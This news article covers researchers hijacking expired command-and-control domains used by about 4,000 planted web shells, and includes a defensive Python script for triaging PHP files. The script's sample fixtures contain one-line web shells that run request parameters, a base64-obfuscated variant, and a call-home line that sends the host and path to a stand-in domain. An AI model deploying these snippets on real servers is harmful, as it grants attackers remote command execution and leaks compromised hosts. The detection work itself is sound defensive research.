Expired Domains Allowed Control Over 4,000 Backdoors on Compromised Systems

No fewer than 4,000 unique web backdoors previously deployed by various threat actors have been hijacked by taking control of abandoned and expired infrastructure, for as little as $20 per domain.
Cybersecurity company watchTowr Labs said it pulled off the operation by registering over 40 domain names that the backdoors had been designed to use for command-and-control (C2). In partnership with the Shadowserver Foundation, the domains implicated in the research have been sinkholed.
"We have been hijacking backdoors (that were reliant on now abandoned infrastructure and/or expired domains) that themselves existed inside backdoors, and have since been watching the results flood in," watchTowr Labs CEO Benjamin Harris and researcher Aliz Hammond said in a technical write-up last week.
"This hijacking allowed us to track compromised hosts as they 'reported in,' and theoretically gave us the power to commandeer and control these compromised hosts."
Compromised targets identified from the beaconing activity included government entities in Bangladesh, China, and Nigeria, and academic institutions in China, South Korea, and Thailand, among others.
The backdoors are web shells: scripts planted on a compromised web server to provide persistent remote access for follow-on exploitation. They vary in scope and functionality -
- Simple PHP web shells that execute an attacker-supplied command passed in a request parameter
- c99shell
- r57shell
- China Chopper, a web shell used prominently by China-nexus advanced persistent threat (APT) groups

Both c99shell and r57shell are fully featured web shells with the ability to execute arbitrary code or commands, perform file operations, deploy additional payloads, brute-force FTP servers, and remove themselves from compromised hosts.
watchTowr Labs also observed instances in which the web shells themselves had been backdoored by their maintainers to report the locations where they were deployed. The operator who planted such a shell thereby inadvertently handed the reins to whoever controlled the maintainer's callback domain, and, once that domain lapsed, to whoever registered it next.
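The two properties the research turns on, request-driven command execution and a hard-coded call-home host, can both be checked statically. The following script is an added example written for this article, not watchTowr's tooling or code from any of the shells named above. It triages PHP sources with constructed heuristics (request data flowing into eval/system-style functions, eval over a decoder, known shell banners, self-deletion), unwraps one common base64 obfuscation layer, and extracts any hard-coded hostnames, flagging those that appear in the same statement as $_SERVER or __FILE__ because that is the shape of a "report where I was installed" beacon. All sample files, hostnames (under the reserved .invalid TLD) and rule names are constructed for the demo.

```python
"""Static triage of PHP files for web-shell primitives and call-home hosts.

Added example for this article; heuristics, samples and hostnames are
constructed and are not watchTowr's tooling or any real shell's source.
"""
import base64
import binascii
import re
import socket

# PHP function names are case-insensitive, hence re.I throughout.
EXEC_FUNCS = r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open)"
REQUEST_SRC = r"\$(?:_GET|_POST|_REQUEST|_COOKIE)\b"

RULES = {
    # attacker-controlled request data reaches an execution primitive
    "exec_from_request": re.compile(EXEC_FUNCS + r"\s*\(\s*[^;]*" + REQUEST_SRC, re.I),
    # eval() fed by a decoder: the classic one-layer obfuscation wrapper
    "decode_then_exec": re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # banners of well-known public shells
    "known_shell_banner": re.compile(r"\b(?:c99shell|r57shell|c99madshell|wso)\b", re.I),
    # "remove yourself" feature
    "self_delete": re.compile(r"\bunlink\s*\(\s*__FILE__\s*\)", re.I),
}
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})", re.I)
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.I)
LOCATION_RE = re.compile(r"\$_SERVER\b|__FILE__|__DIR__")


def decoded_layers(source):
    """Yield the plaintext of every base64 literal passed to base64_decode()."""
    for m in B64_LITERAL.finditer(source):
        try:
            yield base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue


def call_home_hosts(source):
    """Return (sorted hosts, leaks_location).

    A URL in the same statement as $_SERVER/__FILE__ is the signature of a
    shell that reports its own install path to a remote host."""
    hosts, leaks = set(), False
    for stmt in source.split(";"):
        found = HOST_RE.findall(stmt)
        if not found:
            continue
        hosts.update(h.lower() for h in found)
        if LOCATION_RE.search(stmt):
            leaks = True
    return sorted(hosts), leaks


def triage(source, depth=0):
    """Classify one PHP source; recurses up to three obfuscation layers deep."""
    hits = {name for name, rx in RULES.items() if rx.search(source)}
    hosts, leaks = call_home_hosts(source)
    if depth < 3:
        for layer in decoded_layers(source):
            inner = triage(layer, depth + 1)
            hits |= set(inner["hits"])
            hosts = sorted(set(hosts) | set(inner["hosts"]))
            leaks = leaks or inner["leaks_location"]
    if "exec_from_request" in hits or "known_shell_banner" in hits:
        verdict = "web shell"
    elif hits or hosts:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"hits": sorted(hits), "hosts": hosts, "leaks_location": leaks, "verdict": verdict}


def triage_all(files):
    """Map {filename: php_source} to {filename: triage result}."""
    return {name: triage(src) for name, src in files.items()}


def resolves(host):
    """Network check, not used by the offline demo. NXDOMAIN is only a hint that
    a C2 domain lapsed; confirm via RDAP/WHOIS before registering it yourself."""
    try:
        socket.getaddrinfo(host, None)
        return True
    except socket.gaierror:
        return False


# Constructed sample files (not real shell source).
SAMPLES = {
    "chopper.php": "<?php @eval($_POST['cmd']); ?>",
    "simple.php": "<?php if (isset($_GET['c'])) { system($_GET['c']); } ?>",
    "obf.php": "<?php eval(base64_decode('%s')); ?>"
    % base64.b64encode(b"system($_GET['c']);").decode(),
    "r57_like.php": (
        "<?php\n$ver = 'r57shell 1.x';\n"
        "@file_get_contents('http://stats.example.invalid/hit.php?u='"
        ".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);\n"
        "if ($_POST['act'] == 'cmd') passthru($_POST['cmd']);\n"
        "if ($_POST['act'] == 'kill') unlink(__FILE__);\n"
    ),
    "index.php": "<?php echo 'Hello '.htmlspecialchars($_GET['name']); ?>",
}

if __name__ == "__main__":
    for name, result in triage_all(SAMPLES).items():
        print(f"{name:14} {result['verdict']:10} hits={result['hits']} "
              f"hosts={result['hosts']} leaks_location={result['leaks_location']}")
```

Run against a real document root, the hosts column is the list to feed into a registrar/RDAP check: a host that is unregistered is exactly the situation this research exploited, and one that resolves to an address you do not control is a live C2. The heuristics are deliberately narrow (no $_FILES, no string-built function names such as $f = 'sys'.'tem'), so treat "clean" as "nothing obvious", not as a clean bill of health.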
The development comes a couple of months after the company revealed it had spent a mere $20 to acquire a legacy WHOIS server domain ("whois.dotmobiregistry[.]net") associated with the .mobi top-level domain (TLD), identifying more than 135,000 unique systems that were still querying the old server even though the registry had migrated to "whois.nic[.]mobi."
These included private companies such as VirusTotal, as well as mail servers for countless government, military, and university entities. The .gov addresses belonged to Argentina, Bangladesh, Bhutan, Ethiopia, India, Indonesia, Israel, Pakistan, the Philippines, Ukraine, and the U.S.
"It is somewhat encouraging to see that attackers make the same mistakes as defenders," watchTowr Labs said. "It's easy to slip into the mindset that attackers never slip up, but we saw evidence to the contrary – boxes with open web shells, expired domains, and the use of software that has been backdoored."